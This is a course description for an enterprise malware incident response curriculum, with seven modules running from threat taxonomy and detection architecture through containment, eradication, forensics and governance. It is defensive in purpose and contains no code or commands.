Description

This curriculum spans the full incident lifecycle—from threat intelligence integration and detection engineering to forensic analysis and governance—mirroring the iterative, cross-functional workflows seen in enterprise incident response teams managing active malware outbreaks.

Module 1: Threat Landscape and Malware Taxonomy

Selecting malware classification frameworks (e.g., MITRE ATT&CK, VERIS) based on organizational detection capabilities and incident reporting requirements.
Mapping observed malware behaviors to known families (e.g., Emotet, QakBot) using YARA rules and IoC databases from trusted threat intelligence feeds.
Deciding whether to analyze malware in-house or outsource to third-party labs based on resource constraints and data sensitivity.
Integrating dynamic analysis outputs from sandbox environments (e.g., ANY.RUN, Cuckoo) into SIEM workflows for automated alert triage.
Assessing the operational risk of detonating suspicious files in controlled environments with proper network isolation and monitoring.
Updating internal threat models quarterly to reflect shifts in malware delivery vectors such as phishing, RDP brute force, or supply chain compromises.

Module 2: Detection Architecture and Sensor Placement

Deploying EDR agents across hybrid environments while managing performance impact on legacy systems and virtual desktops.
Configuring network-based detection sensors (e.g., Suricata, Zeek) at key ingress/egress points to capture lateral movement and C2 traffic.
Calibrating detection thresholds for heuristic and behavioral alerts to reduce false positives without increasing dwell time.
Implementing DNS sinkholing for known malicious domains and monitoring query patterns for beaconing behavior.
Validating log source coverage across endpoints, firewalls, proxies, and cloud workloads to ensure detection visibility.
Evaluating the trade-offs between signature-based detection and machine learning models in high-noise environments.

Module 3: Incident Triage and Initial Validation

Establishing criteria for escalating alerts based on IoC confidence, asset criticality, and user role (e.g., executive vs. contractor).
Conducting memory and disk acquisition on suspected hosts using forensically sound tools (e.g., Velociraptor, KAPE) without disrupting operations.
Correlating endpoint telemetry with proxy and authentication logs to confirm unauthorized access or data exfiltration.
Deciding whether to immediately isolate a host or allow controlled observation to map attacker infrastructure.
Documenting chain of custody for forensic artifacts when legal or regulatory investigations are anticipated.
Initiating parallel analysis of user activity logs to rule out insider involvement or compromised credentials.

Module 4: Containment Strategies and Network Segmentation

Implementing VLAN resegmentation or firewall rule changes to isolate infected subnets without disrupting business-critical applications.
Disabling compromised user accounts and service principals while preserving login history for timeline reconstruction.
Blocking malicious IPs and domains at the firewall and DNS layers using automated playbooks in SOAR platforms.
Assessing the risk of disabling SMBv1 or other legacy protocols during containment versus maintaining system functionality.
Coordinating with network operations to reroute traffic and maintain availability during containment actions.
Using microsegmentation policies in cloud environments (e.g., AWS Security Groups, Azure NSGs) to restrict lateral movement.

Module 5: Eradication and System Remediation

Determining whether to rebuild infected systems from gold images or perform in-place remediation based on malware persistence mechanisms.
Validating removal of registry run keys, scheduled tasks, and WMI event subscriptions used by fileless malware.
Rotating credentials for local admin, domain admin, and privileged service accounts following known compromise.
Applying firmware and UEFI scanning tools to detect and remove rootkits in persistent system memory.
Re-enabling systems only after confirming clean state via EDR telemetry and log review over a defined observation window.
Updating antivirus signatures and EDR policies to detect previously observed TTPs across the enterprise.

Module 6: Post-Incident Forensics and Timeline Reconstruction

Reconstructing attack timelines using Windows Event Logs (e.g., 4688, 4624, 4104) and PowerShell transcription logs.
Extracting and analyzing prefetch, shimcache, and MFT entries to identify execution order and file modifications.
Mapping lateral movement paths using Kerberos ticket requests, RDP connection logs, and SMB session data.
Conducting memory dump analysis to uncover injected code, hidden processes, and decrypted payloads.
Correlating external threat intelligence with internal findings to attribute activity to known threat actors.
Producing technical reports for legal, compliance, or regulatory bodies with redacted evidence packages.

Module 7: Governance, Reporting, and Continuous Improvement

Defining incident severity levels and escalation paths aligned with business impact and regulatory requirements (e.g., GDPR, HIPAA).
Conducting post-mortem reviews with IT, legal, and executive stakeholders to document root causes and accountability.
Updating incident response playbooks based on gaps identified during recent malware engagements.
Measuring detection-to-remediation time (MTTR) and refining SLAs for future response operations.
Implementing automated phishing simulation and endpoint hardening metrics to validate preventive control efficacy.
Integrating lessons learned into tabletop exercises and red team scenarios to test readiness improvements.